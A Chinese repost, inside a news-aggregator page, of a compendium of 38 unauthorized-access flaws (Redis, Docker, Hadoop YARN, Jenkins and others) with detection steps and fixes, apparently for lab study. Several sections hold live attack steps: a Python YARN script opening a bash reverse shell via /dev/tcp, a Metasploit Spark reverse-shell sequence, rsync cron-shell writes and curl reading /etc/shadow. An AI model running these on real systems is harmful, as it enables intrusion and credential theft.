最新要闻
- 2023山东东营市广饶县事业单位招聘面试通知书领取通知
- 十全食美多种零食 奥利奥大礼包39元1.6斤再发车
- 不涨价!小米13 Ultra限量定制色上架:16+512GB售价6499元
- 仙气飘飘 洛阳90后女生穿汉服开公交:展示传统文化之美
- 观察:发布整整10年后:第一代iPad Air被正式抛弃
- 刺客信条系列中哪个最好玩?刺客信条奥德赛选男还是女?
- 阿迪达斯官网买的产品是正品吗?阿迪达斯和耐克是什么关系?
- 承重墙允许开洞最大尺寸是多少?承重墙拆了要承担什么责任?
- 安陵容知道是宝鹃害她的吗?甄嬛传当年火到什么程度?
- 广交会里的“大食物观” 食品企业坚持科技创新|全球今日报
- 只种一颗杨梅树会结果吗?宏宝莱杨梅冰多少钱一袋?
- gta4热咖啡补丁下载_GTA4热咖啡
- 京口法院微电影把诈骗“演”给你看|世界热门
- 五一假期返程现特种兵式学习:小学生高铁小桌板上疯狂赶作业
- 1盒不到3元!特仑苏全脂/低脂牛奶大促:高蛋白 易吸收
- 世界简讯:AMD正式发布锐龙7040U APU:最先进4nm Zen4、15W超低功耗
手机
iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?
警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案
- iphone11大小尺寸是多少?苹果iPhone11和iPhone13的区别是什么?
- 警方通报辅警执法直播中被撞飞:犯罪嫌疑人已投案
- 男子被关545天申国赔:获赔18万多 驳回精神抚慰金
- 3天内26名本土感染者,辽宁确诊人数已超安徽
- 广西柳州一男子因纠纷杀害三人后自首
- 洱海坠机4名机组人员被批准为烈士 数千干部群众悼念
家电
播报:常见未授权访问漏洞汇总
本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担!!!
本文导读:
本文覆盖了目前网络资讯上公布的30+种未授权访问漏洞
【资料图】
本文把未授权访问漏洞按照默认端口顺序从小到大排列,对于默认端口可进行批量端口探测服务,再进一步进行漏洞检测,逻辑清晰,方便学者学习和漏洞复现。
本文涵盖漏洞描述、漏洞检测和漏洞修复建议为一体,深层次利用不在本文,可自行网上搜索。
未授权访问漏洞介绍
未授权访问漏洞是一个在企业内部非常常见的问题,未授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,导致其他用户可以直接访问,从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露。
演示环境搭建:
使用vulhub搭建漏洞演示环境
参考:https://vulhub.org/#/docs/install-docker/
未授权访问漏洞汇总预览
1 、FTP 未授权访问(21)
2 、LDAP 未授权访问(389)
3 、Rsync 未授权访问(873)
4 、ZooKeeper 未授权访问(2181)
5 、Docker 未授权访问(2375)
6 、Docker Registry未授权(5000)
7 、Kibana 未授权访问(5601)
8 、VNC 未授权访问(5900、5901)
9 、CouchDB 未授权访问(5984)
10 、Apache Spark 未授权访问(6066、8081、8082)
11 、Redis 未授权访问(6379)
12 、Weblogic 未授权访问(7001)
13 、HadoopYARN 未授权访问(8088)
14 、JBoss 未授权访问(8080)
15 、Jenkins 未授权访问(8080)
16 、Kubernetes Api Server 未授权(8080、10250)
17 、Active MQ 未授权访问(8161)
18 、Jupyter Notebook 未授权访问(8888)
19 、Elasticsearch 未授权访问(9200、9300)
20 、Zabbix 未授权访问(10051)
21 、Memcached 未授权访问(11211)
22 、RabbitMQ 未授权访问(15672、15692、25672)
23 、MongoDB 未授权访问(27017)
24 、NFS 未授权访问(2049、20048)
25 、Dubbo 未授权访问(28096)
26 、Druid 未授权访问
27 、Solr 未授权访问
28 、SpringBoot Actuator 未授权访问
29 、SwaggerUI未授权访问漏洞
30 、Harbor未授权添加管理员漏洞
31 、Windows ipc共享未授权访问漏洞
32 、宝塔phpmyadmin未授权访问
33 、WordPress未授权访问漏洞
34 、Atlassian Crowd 未授权访问
35 、PHP-FPM Fastcgi未授权访问漏洞
36 、uWSGI未授权访问漏洞
37 、Kong未授权访问漏洞(CVE-2020-11710)
38 、ThinkAdminV6未授权访问漏洞
1. FTP 未授权访问(21)
漏洞简介
FTP 弱口令或匿名登录漏洞,一般指使用 FTP 的用户启用了匿名登录功能,或系统口令的长度太短、复杂度不够、仅包含数字、或仅包含字母等,容易被黑客攻击,发生恶意文件上传或更严重的入侵行为。
漏洞检测
1、端口扫描
2、直接访问ftp路径:ftp://ip:port/
漏洞修复
禁止匿名登录;
配置强密码,密码长度建议八位以上,且密码应包括大小写字母、特殊字符、数字混合体;
2. LDAP 未授权访问(389)
漏洞简介
LDAP中文全称为:轻型目录访问协议(Lightweight Directory Access Protocol),默认使用389, LDAP 底层一般使用 TCP 或 UDP 作为传输协议。目录服务是一个特殊的数据库,是一种以树状结构的目录数据库为基础。未对LDAP的访问进行密码验证,导致未授权访问。
漏洞检测
1、端口扫描
2、使用nmap寻找到相关的LDAP服务器,可以使用ldapbrowser工具(下载:https://ldapbrowserwindows.com/)直接连接,获取目录内容。
漏洞修复
修改ldap的acl,禁止匿名访问。
根据业务设置ldap访问白名单或黑名单;
3. Rsync 未授权访问(873)
漏洞简介
rsync是Linux/Unix下的一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件和目录,默认运行在873端口。由于配置不当,导致任何人可未授权访问rsync,上传本地文件,下载服务器文件。
漏洞检测
1、端口扫描
2、root@kali使用Rsync命令即可进行检测。
rsync rsync://192.168.126.130:873/
rsync rsync://192.168.126.130:873/src
利用rsync下载任意文件
rsync rsync://192.168.126.130:873/src/
etc/passwd ./
或者写入任意文件
rsync -av shell rsync://192.168.126.130:873/src/etc/cron.d/shell
漏洞修复
隐藏掉 module 信息:修改配置文件 list =false。
权限控制:不需要写入权限的 module 的设置为只读 Read only = true;
网络访问控制:使用安全组策略或白名单限制,只允许必要访问的主机访问;
账户认证:只允许指定的用户利用指定的密码使用 rsync 服务;
数据加密传输:Rsync 默认没有直接支持加密传输,如果需要 Rsync 同步重要性很高的数据,可以使用 ssh;
参考文章:https://www.freebuf.com/column/202771.html
4. ZooKeeper 未授权访问(2181)
漏洞简介
ZooKeeper 是一个分布式的开放源码的分布式应用程序协调服务,ZooKeeper 默认开启在 2181 端口在未进行任何访问控制的情况下攻击者可通过执行 envi 命令获得系统大量的敏感信息包括系统名称Java 环境,任意用户在网络可达的情况下进行为未授权访问并读取数据甚至 kill 服务。
漏洞检测
1、端口扫描
2、漏洞复现
执行root@kali:~# echo envi|nc 192.168.131.128 2181
获取服务器环境信息:
root@kali:~# echo stat |nc 192.168.131.128 2181
漏洞修复
为ZooKeeper配置相应的访问权限;
设置防火墙策略;
禁止把Zookeeper直接暴露在公网;
5. Docker 未授权访问(2375)
漏洞简介
该未授权访问漏洞是因为Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker。
漏洞检测
端口扫描
直接输入地址
http://your-ip:2375/version
。若能访问,证明存在未授权访问漏洞。
漏洞修复
对2375端口做网络访问控制,如ACL控制,或者访问规则;
修改docker swarm的认证方式,使用TLS认证;
6. Docker Registry未授权(5000)
默认5000端口,docker remote api可以执行docker命令,该接口是目的是取代docker 命令界面,通过url操作docker。
漏洞检测:
1、端口扫描
2、http://10.101.20.43:5000/v2
http://10.101.20.43:5000/v2/_catalog
安全建议
1、设置ACL,只允许信任ip连接对应端口
2、开启TLS,使用生成的证书进行认证
7. Kibana 未授权访问(5601)
漏洞简介
Kibana如果允许外网访问,没有做安全的登录认证,也会被外部随意访问查看所有的数据,造成少数据泄露。
漏洞检测
1、端口扫描
2、直接访问kibana的页面
http://192.168.126.130:5601/
https://192.168.126.130/app/kibana#
http://192.168.126.130:5601/app/kibana#/
无需账号密码可以登录进入界面
漏洞修复
设置kibana监听本地地址,并设置ElasticSearch登录的账号和密码;
设置防火墙策略,限定IP访问服务;
8. VNC 未授权访问(5900、5901)
漏洞简介
VNC 是虚拟网络控制台Virtual Network Console的英文缩写。它是一款优秀的远程控制工具软件由美国电话电报公司AT&T的欧洲研究实验室开发。VNC是基于 UNXI 和 Linux 的免费开源软件由 VNC Server 和 VNC Viewer 两部分组成。
VNC 默认端口号为 5900、5901。VNC 未授权访问漏洞如被利用可能造成恶意用户直接控制受控主机危害相当严重。
漏洞检测
1、端口扫描
2、使用 VNC 客户端连接主机
VNC-Viewer工具下载(https://www.realvnc.com/en/connect/download/viewer/windows/)
安装过程,双击msi文件一路下一步就可以了。
在 VNC 客户端输入目标服务器IP,之后点击确定、连接,即可成功控制目标服务器
漏洞修复
配置 VNC 客户端登录口令认证并配置符合密码强度要求的密码;
以最小权限的普通用户身份运行操作系统;
9. CouchDB 未授权访问(5984)
漏洞简介
Apache CouchDB 是一个开源数据库,默认会在5984端口开放Restful的API接口,如果使用SSL的话就会监听在6984端口,用于数据库的管理功能。其HTTP Server默认开启时没有进行验证,而且绑定在0.0.0.0,所有用户均可通过API访问导致未授权访问。
在官方配置文档中对HTTP Server的配置有WWW-Authenticate:Set this option to trigger basic-auth popup on unauthorized requests,但是很多用户都没有这么配置,导致漏洞产生。
漏洞检测
1、端口扫描
2、未授权访问kali测试命令
curl 192.168.126.130:5984
curl 192.168.126.130:5984/_config
漏洞修复
- 指定CouchDB绑定的IP (需要重启CouchDB才能生效)在 /etc/couchdb/local.ini 文件中找到 “bind_address = 0.0.0.0” ,把 0.0.0.0 修改为 127.0.0.1 ,然后保存。注:修改后只有本机才能访问CouchDB。
- 设置访问密码(需要重启CouchDB才能生效)在 /etc/couchdb/local.ini 中找到“[admins]”字段配置密码。
- 设置WWW-Authenticate,强制认证。
10. Apache Spark 未授权访问(6066、8081、8082)
漏洞简介
Apache Spark是一款集群计算系统,其支持用户向管理节点提交应用,并分发给集群执行。如果管理节点未启动访问控制,攻击者可以在集群中执行任意代码。该漏洞的本质是未授权用户可以向Master节点提交一个应用,Master节点会分发给Slave节点执行应用。如果应用中包含恶意代码,会导致任意代码执行,威胁Spark集群整体的安全性。
漏洞检测
nmap扫描出如下端口开放,则很有可能存在漏洞
使用msf工具getshell
msf5>use exploit/linux/http/spark_unauth_rcemsf5>set payload java/meterpreter/reverse_tcpmsf5>set rhost 192.168.100.2msf5>set rport 6066msf5>set lhost 192.168.100.1msf5>set lport 4444msf5>set srvhost 192.168.100.1msf5>set srvport 8080msf5>exploit
漏洞修复
对外关闭敏感端口;
配置用户权限认证;
参考文章:https://www.cnblogs.com/KevinGeorge/p/10399844.html
11. Redis 未授权访问(6379)
漏洞简介
redis是一个数据库,默认端口是6379,redis默认是没有密码验证的,可以免密码登录操作,攻击者可以通过操作redis进一步控制服务器。
Redis未授权访问在4.x/5.0.5以前版本下,可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。
漏洞检测
端口扫描
Kali连接主机
(1)kali安装redis-cli远程连接工具
wget http://download.redis.io/redis-stable.tar.gztar -zxvf redis-stable.tar.gzcd redis-stablemakecp src/redis-cli /usr/bin/redis-cli -h
(2)使用redis-cli命令直接远程免密登录redis主机
redis-cli -h 目标主机IP
(3)尝试keys * 命令,若存在以下页面,则存在漏洞
(4)进一步利用
利用redis 可视化工具Another Redis Desktop Manager
漏洞修复
到redis安装目录下,配置redis.conf文件:
1、默认只对本地开放
bind 127.0.0.1
2、添加登陆密码
修改 redis.conf 文件,添加
requirepass mypasswd
3、在需要对外开放的时候修改默认端口(端口不重复就可以)
port 2344
4、以低权限运行 Redis 服务(重启redis才能生效)
为 Redis 服务创建单独的用户和家目录,并且配置禁止登陆
5、最后还可以配合iptables限制开放
12. Weblogic 未授权访问(7001)
漏洞简介
Weblogic是Oracle公司推出的J2EE应用服务器,CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台。
CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。
漏洞检测
1、端口扫描
2、使用vulhub搭建漏洞演示环境
cd vulhub/weblogic/CVE-2020-14882
sudo docker-compose up –d
攻击者可以构造特殊请求的URL,即可未授权访问到管理后台页面:
http://192.168.126.130:7001/console/css/%252e%252e%252fconsole.portal
远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console ,并在 WebLogic Server Console 执行任意代码。
漏洞修复
下载补丁程序并安装更新;
13. HadoopYARN 未授权访问(8088)
漏洞简介
Hadoop是一款由Apache基金会推出的分布式系统框架,它通过著名的MapReduce算法进行分布式处理,Yarn是Hadoop集群的资源管理系统。
此次事件主要因HadoopYARN资源管理系统配置不当,导致可以未经授权进行访问,从而被攻击者恶意利用。攻击者无需认证即可通过RESTAPI部署任务来执行任意指令,最终完全控制服务器。
漏洞检测
1、端口扫描
2、使用vulhub搭建漏洞演示环境
cd /vulhub/hadoop/unauthorized-yarn
docker-compose up -d
3、环境启动后,没有配置身份认证,可以未授权访问到Hadoop YARN ResourceManager WebUI页面。
http://192.168.126.130:8088/
http://192.168.126.130:8088/cluster
利用该漏洞,可以进一步getshell
脚本源码如下:rce.py
#!/usr/bin/env pythonimport requeststarget = "http://192.168.126.130:8088/" # 设置目标主机的ip地址lhost = "192.168.126.128" # 设置你攻击主机的监听ip地址,并且监听端口为9999url = target + "ws/v1/cluster/apps/new-application"resp = requests.post(url)app_id = resp.json()["application-id"]url = target + "ws/v1/cluster/apps"data = { "application-id": app_id, "application-name": "get-shell", "am-container-spec": { "commands": { "command": "/bin/bash -i >& /dev/tcp/%s/9999 0>&1" % lhost, }, }, "application-type": "YARN",}requests.post(url, json=data)
漏洞修复
升级Hadoop到x版本以上,并启用Kerberos认证功能,禁止匿名访问;
设置“安全组”访问控制策略,将 Hadoop 默认开放的多个端口对公网全部禁止或限制可信任的 IP 地址才能访问包括 50070 以及 WebUI 等相关端口;
如无必要,关闭 Hadoop Web 管理页面;
14. JBoss 未授权访问(8080)
漏洞简介
漏洞简述JBOSS 企业应用平台EAP是 J2EE 应用的中间件平台。默认情况下访问 http://ip:8080/jmx-console,就可以浏览 Jboss 的部署管理的信息不需要输入用户名和密码可以直接部署上传木马有安全隐患。
漏洞检测
1、端口扫描
2、直接访问 http://ip:port/
,看是否能进入jmx-console
和 web-console
页面
http://ip:8080/
http://ip:8080/jmx-console/
http://ip:8080/jbossws/
漏洞修复
添加 JMX 控制页面身份认证;
进行JMX Console 安全配置;
关闭jmx-console和web-console;
15. Jenkins 未授权访问(8080)
漏洞简介
默认情况下Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进脚本执行界面从而获取服务器权限。
漏洞检测
1、端口扫描
2、直接通过url输入以下地址,若能访问,证明存在未授权访问漏洞。
http://
http://
未授权访问 http://
,可以执行系统命令
# 命令格式
println "whoami".execute().text
漏洞修复
对后台控制页面做登录验证限制;
升级Jenkins至新版本;
禁止把Jenkins直接暴露在公网;
16. Kubernetes Api Server 未授权(8080、10250)
漏洞简介
Kubernetes 的服务在正常启动后会开启两个端口:Localhost Port (默认8080)、Secure Port (默认6443)。这两个端口都是提供 Api Server 服务的,一个可以直接通过 Web 访问,另一个可以通过 kubectl 客户端进行调用。如果运维人员没有合理的配置验证和权限,那么攻击者就可以通过这两个接口去获取容器的权限。
漏洞检测
1、端口扫描
使用nmap寻找相关的端口和服务,直接访问脆弱的服务
2、检测
(1)端口:8080
http://10.10.4.89:8080/
(2)端口:8080:api dashboard:http://10.10.4.89:8080/ui
(3)端口:10250端口
是kubelet API的HTTPS端口,通过路径:https://xxx/10250/pods
获取环境变量、运行的容器信息、命名空间等信息。
漏洞修复
进行授权认证;
使用Service Account令牌;
设置防火墙策略,限定IP访问服务;
17. Active MQ 未授权访问(8161)
漏洞简介
ActiveMQ 是一款流行的开源消息服务器。默认情况下,ActiveMQ 服务是没有配置安全参数。恶意人员可以利用默认配置弱点发动远程命令执行攻击,获取服务器权限,从而导致数据泄露。
漏洞检测
默认端口:8161
默认密码:admin/admin
漏洞修复
- 针对未授权访问,可修改
conf/jetty.xml
文件,bean id为securityConstraint下的authenticate修改值为true
,重启服务即可。 - 针对弱口令,可修改
conf/jetty.xml
文件,bean id 为securityLoginService下的conf值获取用户properties,修改用户名密码,重启服务即可。
18. Jupyter Notebook 未授权访问(8888)
漏洞简介
Jupyter Notebook(此前被称为 IPython notebook)是一个交互式笔记本,支持运行 40 多种编程语言。如果管理员未为Jupyter Notebook配置密码,将导致未授权访问漏洞,游客可在其中创建一个console并执行任意Python代码和命令。
漏洞检测
1、使用vulhub搭建漏洞演示环境
cd /vulhub/jupyter/notebook-rce
docker-compose up -d
2、端口扫描
3、访问http://your-ip:8888
,将看到Jupyter Notebook的Web管理界面,并没有要求填写密码。
选择 new -> terminal 即可创建一个控制台:
直接执行任意命令:
漏洞修复
开启身份验证,防止未经授权用户访问;
访问控制策略,限制IP访问,绑定固定IP;
19. Elasticsearch 未授权访问(9200、9300)
漏洞简介
Elasticsearch是一款java编写的企业级搜索服务。越来越多的公司使用ELK作为日志分析,启动此服务默认会开放9200端口或者9300端口,可被非法操作数据。
漏洞检测
1、端口扫描
2、浏览器访问测试命令
http://localhost:9200
http://localhost:9200/_cat/
http://localhost:9200/_cat/indices
http://localhost:9200/_river/_search //查看数据库敏感信息
http://localhost:9200/_nodes //查看节点数据
如有安装head插件:
http://localhost:9200/_plugin/head/ //web管理界面
漏洞修复
访问控制策略,限制IP访问,绑定固定IP;
在config/elasticsearch.yml中为9200端口设置认证等;
20. Zabbix 未授权访问(10051)
漏洞简介
zabbix是一款服务器监控软件,默认服务开放端口为10051,其由server、agent、web等模块组成,其中web模块由PHP编写,用来显示数据库中的结果。
漏洞检测
1、端口扫描
2、无需账户密码直接访问zabbix页面
漏洞修复
设置zabbix的复杂口令,不要用默认口令或弱口令,禁用guest登录功能;
zabbix的server和agent都不要以root启动,不要设置AllowRoot=1;
禁止agent执行run,不要设置EnableRemoteCommands=1;
21. Memcached 未授权访问(11211)
漏洞简介
Memcached 端口对外开放并且没有配置认证选项,未授权用户可直接获取数据库中所有信息,造成严重的信息泄露。
漏洞检测
1、端口扫描
2、无需用户名密码,可以直接连接memcache 服务的11211端口
telnet 10.10.4.89 11211
# 或者
nc -vv 11211
telnet 192.168.96.128 11211
使用了 stats 命令来输出 Memcached 服务信息
nc -vv 192.168.96.128 11211
漏洞修复
修改绑定的IP、端口和指定访问者IP;
设置防火墙策略;
禁止暴露在公网;
配置memcached监听本地回环地址
127.0.0.1;
22. RabbitMQ 未授权访问(15672、15692、25672)
漏洞简介
RabbitMQ是目前非常热门的一款消息中间件,基于AMQP协议的,可以在发布者和使用者之间交换异步消息。消息可以是人类可读的JSON,简单字符串或可以转换为JSON字符串的值列表。
漏洞检测
1、端口扫描
2、浏览器访问测试
默认账号密码都是guest
http://10.10.4.89:15672
http://10.10.4.89:15692
http://10.10.4.89:25672
漏洞修复
修改为强密码,删除默认的账号guest;
禁止对外网开放,仅限于内部访问;
23. MongoDB 未授权访问(27017)
漏洞简介
开启MongoDB服务时不添加任何参数时,默认是没有权限验证的,登录的用户可以通过默认端口无需密码对数据库任意操作(增、删、改、查高危动作)而且可以远程访问数据库。
造成未授权访问的根本原因就在于启动 Mongodb 的时候未设置 –auth 也很少会有人会给数据库添加上账号密码(默认空口令),使用默认空口令这将导致恶意攻击者无需进行账号认证就可以登陆到数据服务器。
漏洞检测
1、端口扫描
2、kali安装mongodb,然后直接连接到服务。
yum install mongodb
mongo --host 10.2.20.34 --port 27017
漏洞修复
限制绑定IP,启动时加入参数--bind_ip 127.0.0.1或在/etc/mongodb.conf文件中添加以下内容:bind_ip = 127.0.0.1;
在system.users中添加用户,启动认证;
设置防火墙策略,限定 IP 访问服务;
禁用HTTP和REST端口,修改配置文件或在启动的时候选择参数nohttpinterface=false;
24. NFS 未授权访问(2049、20048)
漏洞简介
Network File System(NFS),是由SUN公司研制的UNIX表示层协议(pressentation layer protocol),能使使用者访问网络上别处的文件就像在使用自己的计算机一样。服务器在启用nfs服务以后,由于nfs服务未限制对外访问,导致共享目录泄漏。
漏洞检测
1、端口扫描
2、
#linux安装nfs客户端
apt install nfs-common
#查看nfs服务器上的共享目录
showmount -e 192.168.126.130
#挂载相应共享目录到本地
mount -t nfs 192.168.126.130:/grdata /mnt
#卸载目录
umount /mnt
漏洞修复
利用iptables限制端口
2049
和20048
端口的访问,禁止外部访问
;设置
/etc/exports
,对访问进行控制;
25. Dubbo 未授权访问(28096)
漏洞简介
Dubbo是阿里巴巴公司开源的一个高性能优秀的 服务框架,使得应用可通过高性能的 RPC 实现服务的输 出和输入功能,可以和 Spring框架无缝集成。dubbo 因配置不当导致未授权访问漏洞。
漏洞检测
1、端口扫描
2、连接进入dubbo 服务,进行操作
telent IP port
漏洞修复
配置dubbo认证;
设置防火墙策略,限定IP访问;
26. Druid 未授权访问
漏洞简介
Druid是阿里巴巴数据库出品的,为监控而生的数据库连接池,并且Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控,首先Druid是不存在什么漏洞的。但当开发者配置不当时就可能造成未授权访问。
漏洞检测
直接在网站的url中后加上:
/druid/index.html
/druid/websession.html
/druid/datasource.html
/druid/sql.html
/druid/spring.html
如果可以无需登录,即可登录到Druid监控界面,则说明该网站存在Druid未授权访问漏洞
漏洞修复
配置访问账号密码;
禁止对外网开放访问;
27. Solr 未授权访问
漏洞简介
Solr是一个高性能,采用Java开发,基于Lucene的全文搜索服务器。solr的管理界面通常包含如下信息:solr的配置信息(包括路径,用户名,系统版本信息),数据库的配置信息(地址,用户名,密码),数据库搜索数据等。solr未授权访问的危害很大,轻则可查询所有数据库信息,重则可读取系统任意文件,甚至getshell。
漏洞检测
敏感目录扫描时加上一条 /solr/admin
http://xx.xx.com/solr/admin
https://xx.xx.com/solr/admin
漏洞修复
配置solr访问控制权限;
禁止将solr暴露在公网;
28. SpringBoot Actuator 未授权访问
漏洞简介
Actuator 是 springboot 提供的用来对应用系统进行自省和监控的功能模块,借助于 Actuator 开发者可以很方便地对应用系统某些监控指标进行查看、统计等。在 Actuator 启用的情况下,如果没有做好相关权限控制,非法用户可通过访问默认的执行器端点(endpoints)来获取应用系统中的监控信息,从而导致信息泄露甚至服务器被接管的事件发生。
漏洞检测
1、直接访问相关路径:
http://10.2.20.48/actuator/autoconfig
http://10.2.20.48 /actuator/env
http://10.2.20.48/actuator/dump
http://10.2.20.48/actuator/headdump
可下载
2、actuator未直接部署在IP根目录下
使用burpsuite的插件:APIKit
介绍:https://www.bilibili.com/read/cv15912732
介绍:https://blog.csdn.net/qq_50854790/article/details/122894291
漏洞修复
禁用/env接口
;升级到SpringBoot Actuator 2.0;
禁止
对外开放;
29. SwaggerUI未授权访问漏洞
背景
Swagger 是一个规范且完整的框架,用于生成、描述、调用和可视化 RESTful 风格的 Web 服务。
漏洞检测
1、可利用未授权访问漏洞,直接访问以下链接:
漏洞检测
1、可利用未授权访问漏洞,直接访问以下链接(目录遍历)
2、swagger-ui未直接部署在IP根目录下
使用burpsuite的插件:APIKit
介绍:https://www.bilibili.com/read/cv15912732
介绍:https://blog.csdn.net/qq_50854790/article/details/122894291
修复方法
- 设置访问权限
30. Harbor未授权添加管理员漏洞
Harbor未授权添加任意管理员漏洞。攻击者可通过构造特定的字符串,在未授权的情况下直接创建管理员账号,从而接管Harbor镜像仓库。
漏洞地址:http://10.101.20.111/harbor/sign-in
成功添加用户,账号coco密码coco1234
成功接管harbor镜像仓库
安全建议
尽快升级到安全版本,下载链接参考:
https://github.com/goharbor/harbor/releases
31. Windows ipc共享未授权访问漏洞
32. 宝塔phpmyadmin未授权访问
漏洞简介
宝塔Linux面板7.4.2版本
和Windows面板6.8版本
存在phpmyadmin未授权访问漏洞
phpmyadmin未鉴权,可通过特定地址直接登录数据库的漏洞。
漏洞检测
1、目录扫描:/pma
或者 /phpmyadmin
2、漏洞URL:http://ip:888/pma
即可直接登录(但要求必须安装了phpmyadmin)
漏洞修复
更新宝塔phpmyadmin为最新版本
33. WordPress未授权访问漏洞
漏洞复现
可参考:https://www.cnblogs.com/bflw/p/12342845.html
34. Atlassian Crowd 未授权访问
漏洞简介
Atlassian Crowd是一套基于Web的单点登录系统。该系统为多用户、网络应用程序和目录服务器提供验证、授权等功能。Atlassian Crowd Data Center是Crowd的集群部署版。
Atlassian Crowd和Crowd Data Center在其某些发行版本中错误地启用了pdkinstall开发插件,使其存在安全漏洞。攻击者利用该漏洞可在未授权访问的情况下对Atlassian Crowd和Crowd Data Center安装任意的恶意插件,执行任意代码/命令,从而获得服务器权限。
漏洞检测
漏洞利用脚本github地址:https://github.com/jas502n/CVE-2019-11580
git clone https://github.com/jas502n/CVE-2019-11580
cd CVE-2019-11580/
python CVE-2019-11580.py http://192.168.18.138:8095
curl http://192.168.18.138:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow
漏洞修复
- 设置访问/crowd/admin/uploadplugin.action的源ip。
- 升级最新版本(3.5.0以上)。
35. PHP-FPM Fastcgi未授权访问漏洞
详情请见:https://www.freebuf.com/articles/web/278245.html(第25条)
36. uWSGI未授权访问漏洞
详情请见:https://www.freebuf.com/articles/web/278245.html (第27条)
37. Kong未授权访问漏洞(CVE-2020-11710)
环境部署
略。
漏洞复现
复现可参考https://xz.aliyun.com/t/7631
38. ThinkAdminV6未授权访问漏洞
环境部署
略。
漏洞复现
可参考https://www.cnblogs.com/cn-gov/p/13715861.html
【归纳补充】
补充:批量检测漏洞思路(史上最经典)
批量探测默认端口
对于拼接字符串检测的未授权漏洞,使用自定义字典进行批量目录扫描,查看状态码。对于正常响应的,可以批量进行浏览器访问测试(工具:http://www.ab173.com/zhanzhang/openurls.php)
【参考文章】
1、二十九种未授权访问漏洞合集,真的很全面
https://www.sohu.com/a/551258460_121349997
2、超全面未授权访问漏洞复现合集 (含:测试环境部署 和 进一步漏洞利用)
https://www.freebuf.com/articles/web/278245.html
3、常用的30+种未授权访问漏洞汇总
https://mp.weixin.qq.com/s/r2OafWfNxAQgH1z7pKdX3A
关键词:
播报:常见未授权访问漏洞汇总
每日播报!AD主辅域控切换-辅域控制器升级为主域控制器-详细操作
Excel文件根据自定义模板生成标签或数据报表
2023山东东营市广饶县事业单位招聘面试通知书领取通知
u18包括18岁吗?足球比赛中的u系列是什么意思?
英雄联盟150位英雄名字是什么?2022lpl夏季赛赛程表
iphone手机看电子书能用什么格式?iphone电子书APP推荐
NBA 2K14存档文件在哪里?nba2k14电脑版键盘操作
十全食美多种零食 奥利奥大礼包39元1.6斤再发车
不涨价!小米13 Ultra限量定制色上架:16+512GB售价6499元
仙气飘飘 洛阳90后女生穿汉服开公交:展示传统文化之美
观察:发布整整10年后:第一代iPad Air被正式抛弃
刺客信条系列中哪个最好玩?刺客信条奥德赛选男还是女?
阿迪达斯官网买的产品是正品吗?阿迪达斯和耐克是什么关系?
承重墙允许开洞最大尺寸是多少?承重墙拆了要承担什么责任?
安陵容知道是宝鹃害她的吗?甄嬛传当年火到什么程度?
广交会里的“大食物观” 食品企业坚持科技创新|全球今日报
只种一颗杨梅树会结果吗?宏宝莱杨梅冰多少钱一袋?
怎么改蚂蚁庄园小鸡的名字?蚂蚁森林如何修改自己的昵称?
天天微速讯:学系统集成项目管理工程师(中项)系列17a_范围管理(上)
使用python查看五黄及罗猴
世界百事通!【访问者设计模式详解】C/Java/JS/Go/Python/TS不同语言实现
THE PLANETS MERCURY -环境变量的设置提权以及SETENV的理解
嵌入式测试手册——基于NXP iMX6ULL开发板(2)
gta4热咖啡补丁下载_GTA4热咖啡
京口法院微电影把诈骗“演”给你看|世界热门
五一假期返程现特种兵式学习:小学生高铁小桌板上疯狂赶作业
1盒不到3元!特仑苏全脂/低脂牛奶大促:高蛋白 易吸收
世界简讯:AMD正式发布锐龙7040U APU:最先进4nm Zen4、15W超低功耗
“非洲狮的好朋狗”?动物园回应圈养鸡羊狗:珍稀品种 非普通家禽|每日观点
320.37万人次,42.32亿元!海南“五一”旅游成绩单出炉 今日热文
观热点:第1章 大数据概述
世界热点评!内网穿透
工控机中部署Ubuntu 22.04 系统
【财经分析】贝泰妮高增长不再 股价跌去六成后能否再出发?
全球热点评!众智科技:4月28日获融资买入89.58万元,占当日流入资金比例19.76%
特斯拉中国突然涨价 销售催“等等党”赶紧下单:早买车就是赚到
路人如何衡量汽车品牌营销费用高低?李想支了一招:看留言-天天速讯
止渴解腻夏日必备!果舒拉桂花酸梅晶好价:3盒券后29.9
男子在西湖捞手机日入约一万!官方回应:不是景区工作人员
热火老将乐福本赛季中期从骑士买断加盟
襄阳市市场监管局开展“你点襄检”专项执法行动_全球头条
【国际大宗商品早报】经济衰退前景打压国际油价大幅下挫4% 美麦涨超5% 当前关注
中国影史第三!今年五一档电影总票房超15亿元
【天天播资讯】40系显卡3大优势!再买30系就冤了
世界热议:喂到嘴边的肥肉!新势力无奈破产:富士康喜提造车工厂一座
阿里云:亏了13年刚赚钱 为啥被逼着五折大促销?
世界热资讯!916万人次假期逛郑州 尽享“文化味”“烟火气”
通过Python进行MySQL表信息统计
互联网鬼城!AI专属社交平台爆火:人类只能看不能说_全球最新
小米13 Ultra白色16GB+1 TB版今日首发:7299元
成交单价突破42万元 比亚迪:腾势D9连续4个月30万元以上新能源MPV第一
中远海发(02866.HK):5月3日南向资金减持98.5万股
芍药坦荡荡
云原生底座之上,这些企业领跑行业的秘密
二、高级语言语法描述
降价9万后雪铁龙C6销量暴涨!总经理:价格战对品牌有伤害
环球今日报丨李想怒怼车评媒体人:不投放你 就是因为你太爱煽风点火
骁龙8+平板只要2399!小米是懂人性弱点的-天天热讯
全网千万人学鼻子转牙签 详细教程在此:你学废了吗? 前沿热点
实时焦点:必胜韩国语园地原声韩剧在线观看_必胜韩国语园地
斩赤红之瞳结局谁活着_斩赤红之瞳结局
快消息!时隔7年季后赛再拿两双 两次重伤打不垮辽宁铁人
动态物体追踪 每日简讯
